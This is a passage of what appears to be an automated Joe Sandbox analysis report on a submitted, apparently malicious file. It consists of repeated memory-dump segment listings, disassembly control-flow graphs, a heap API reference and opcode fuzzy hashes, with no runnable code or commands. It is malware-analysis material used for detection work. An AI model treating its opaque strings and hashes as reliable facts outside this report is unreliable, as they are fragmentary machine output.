                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0kIDZS1AddzvbqcMuXqu5mPsh5phixIkLU9lDK.HpZc-1728848408-0.0.1.1-/api$J|BJ$V$VY^_$t
                                                                                                          • API String ID: 0-2625546758
                                                                                                          • Opcode ID: 9d1217ca2c692530ace4ecc1e6213d36af382f4000e3dc3003585c7433e66868
                                                                                                          • Instruction ID: 4364ab11c4d075d136f71a631831b79163e8f1ef7856fe66c26bc5f707468824
                                                                                                          • Opcode Fuzzy Hash: 9d1217ca2c692530ace4ecc1e6213d36af382f4000e3dc3003585c7433e66868
                                                                                                          • Instruction Fuzzy Hash: 9AD18A7950C3809BD711DF18D59066FBBE1AF96B84F24881CF4C98B252C336DD4ADB92

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 340 1d5700-1d5714 341 1d578c-1d5795 call 1d31a0 340->341 342 1d5729-1d574a 340->342 343 1d571b-1d5722 340->343 344 1d5797-1d57a5 call 1d3220 340->344 345 1d57b0 340->345 346 1d57b2 340->346 348 1d57b4-1d57b9 341->348 349 1d574c-1d574f 342->349 350 1d5776-1d578a RtlReAllocateHeap 342->350 343->342 343->344 343->345 343->346 344->345 345->346 346->348 353 1d5750-1d5774 call 1d5b30 349->353 350->348 353->350
                                                                                                          APIs
                                                                                                          • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 001D5784
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 1279760036-0
                                                                                                          • Opcode ID: 0e45a86e38ad7c503b732ce5b9244a426be0581ab07e54e58ee1fbc8ca543401
                                                                                                          • Instruction ID: 286c64945d2616c11796c2a269715c791dcbc4451296355bb8b68f7173ae6333
                                                                                                          • Opcode Fuzzy Hash: 0e45a86e38ad7c503b732ce5b9244a426be0581ab07e54e58ee1fbc8ca543401
                                                                                                          • Instruction Fuzzy Hash: 7911E03090C280EBC301AF28E844A1FBBF6AF9A700F158829E4C48B311C335D911CB93

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 397 1a049b-1a0515 call 19c9f0 401 1a045b-1a0469 call 1d5700 397->401 402 1a03fb-1a0414 397->402 403 1a0339-1a034f 397->403 404 1a03be 397->404 405 1a03de-1a03e3 397->405 406 1a035f-1a0367 397->406 407 1a051c-1a051e 397->407 408 1a0472-1a0477 397->408 409 1a0393-1a0397 397->409 410 1a0370-1a037e 397->410 411 1a03d0-1a03d7 397->411 412 1a0311-1a0332 397->412 413 1a0356 397->413 414 1a0417-1a0430 397->414 415 1a0308-1a030c 397->415 416 1a03ec-1a03f4 397->416 417 1a0242-1a0244 397->417 418 1a0482-1a0484 397->418 419 1a0440-1a0458 call 1d5700 397->419 420 1a0480 397->420 421 1a0246-1a0260 397->421 422 1a0386-1a038c 397->422 423 1a0227-1a023b 397->423 401->408 402->414 403->401 403->402 403->404 403->405 403->406 403->408 403->409 403->410 403->411 403->413 403->414 403->416 403->418 403->419 403->420 403->422 404->411 405->416 406->410 427 1a0520-1a0b30 407->427 408->420 436 1a03a0-1a03b7 409->436 410->422 411->402 411->405 411->408 411->409 411->414 411->416 411->418 411->420 411->422 412->401 412->402 412->403 412->404 412->405 412->406 412->408 412->409 412->410 412->411 412->413 412->414 412->416 412->418 412->419 412->420 412->422 413->406 414->419 425 1a048d-1a0496 415->425 416->402 416->408 416->409 416->418 416->420 428 1a0296-1a02bd 417->428 418->425 419->401 429 1a0262 421->429 430 1a0294 421->430 422->408 422->409 422->418 422->420 423->401 423->402 423->403 423->404 423->405 423->406 423->408 423->409 423->410 423->411 423->412 423->413 423->414 423->415 423->416 423->417 423->418 423->419 423->420 423->421 423->422 425->427 438 1a02ea-1a0301 428->438 439 1a02bf 428->439 437 1a0270-1a0292 call 1a2eb0 429->437 430->428 436->401 436->402 436->404 436->405 436->408 436->409 436->411 436->414 436->416 436->418 436->419 436->420 436->422 437->430 438->401 438->402 438->403 438->404 438->405 438->406 438->408 438->409 438->410 438->411 438->412 438->413 438->414 438->415 438->416 438->418 438->419 438->420 438->422 444 1a02c0-1a02e8 call 1a2e70 439->444 444->438
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 58247b99b026024a102407503ee4fdf31df2845cce6720417513bb98a5d90d5d
                                                                                                          • Instruction ID: 3478b73e0552066cf1115ab04f24ed4467579d0a6fa6c92a215bc98e259877c3
                                                                                                          • Opcode Fuzzy Hash: 58247b99b026024a102407503ee4fdf31df2845cce6720417513bb98a5d90d5d
                                                                                                          • Instruction Fuzzy Hash: 8B919C75201B00CFD725CF25D890A2BB7F6FF89310B158A6DE8968BAA1D730E956CB50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 451 1a0228-1a023b 452 1a045b-1a0469 call 1d5700 451->452 453 1a03fb-1a0414 451->453 454 1a0339-1a034f 451->454 455 1a03be 451->455 456 1a03de-1a03e3 451->456 457 1a035f-1a0367 451->457 458 1a0472-1a0477 451->458 459 1a0393-1a0397 451->459 460 1a0370-1a037e 451->460 461 1a03d0-1a03d7 451->461 462 1a0311-1a0332 451->462 463 1a0356 451->463 464 1a0417-1a0430 451->464 465 1a0308-1a030c 451->465 466 1a03ec-1a03f4 451->466 467 1a0242-1a0244 451->467 468 1a0482-1a0484 451->468 469 1a0440-1a0458 call 1d5700 451->469 470 1a0480 451->470 471 1a0246-1a0260 451->471 472 1a0386-1a038c 451->472 452->458 453->464 454->452 454->453 454->455 454->456 454->457 454->458 454->459 454->460 454->461 454->463 454->464 454->466 454->468 454->469 454->470 454->472 455->461 456->466 457->460 458->470 484 1a03a0-1a03b7 459->484 460->472 461->453 461->456 461->458 461->459 461->464 461->466 461->468 461->470 461->472 462->452 462->453 462->454 462->455 462->456 462->457 462->458 462->459 462->460 462->461 462->463 462->464 462->466 462->468 462->469 462->470 462->472 463->457 464->469 474 1a048d-1a0b30 465->474 466->453 466->458 466->459 466->468 466->470 476 1a0296-1a02bd 467->476 468->474 469->452 477 1a0262 471->477 478 1a0294 471->478 472->458 472->459 472->468 472->470 486 1a02ea-1a0301 476->486 487 1a02bf 476->487 485 1a0270-1a0292 call 1a2eb0 477->485 478->476 484->452 484->453 484->455 484->456 484->458 484->459 484->461 484->464 484->466 484->468 484->469 484->470 484->472 485->478 486->452 486->453 486->454 486->455 486->456 486->457 486->458 486->459 486->460 486->461 486->462 486->463 486->464 486->465 486->466 486->468 486->469 486->470 486->472 491 1a02c0-1a02e8 call 1a2e70 487->491 491->486
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d5ddc47bac9b681039310b2c9eaebcb0ddfe296bcddab97f597bc5512f41fe1b
                                                                                                          • Instruction ID: fb89ad81b249c85b9f6de897b7276e3ebb5b5170220ae6a7792f95d073a1c5e9
                                                                                                          • Opcode Fuzzy Hash: d5ddc47bac9b681039310b2c9eaebcb0ddfe296bcddab97f597bc5512f41fe1b
                                                                                                          • Instruction Fuzzy Hash: A8718C74202700DFD7258F64EC94B1BB7F6FF4A311F10896DE8468BA62C731A956CB50

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 500 19d110-19d11b call 1d4cc0 503 19d2ee-19d2f6 500->503 504 19d121-19d130 call 1cc8d0 500->504 509 19d2e9 call 1d56e0 504->509 510 19d136-19d15f 504->510 509->503 514 19d161 510->514 515 19d196-19d1bf 510->515 518 19d170-19d194 call 19d300 514->518 516 19d1c1 515->516 517 19d1f6-19d20c 515->517 519 19d1d0-19d1f4 call 19d370 516->519 520 19d239-19d23b 517->520 521 19d20e-19d20f 517->521 518->515 519->517 525 19d23d-19d25a 520->525 526 19d286-19d2aa 520->526 524 19d210-19d237 call 19d3e0 521->524 524->520 525->526 532 19d25c-19d25f 525->532 528 19d2ac-19d2af 526->528 529 19d2d6-19d2dd call 19e8f0 526->529 533 19d2b0-19d2d4 call 19d490 528->533 529->509 541 19d2df call 1a2f10 529->541 536 19d260-19d284 call 19d440 532->536 533->529 536->526 544 19d2e4 call 1a0b40 541->544 544->509
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
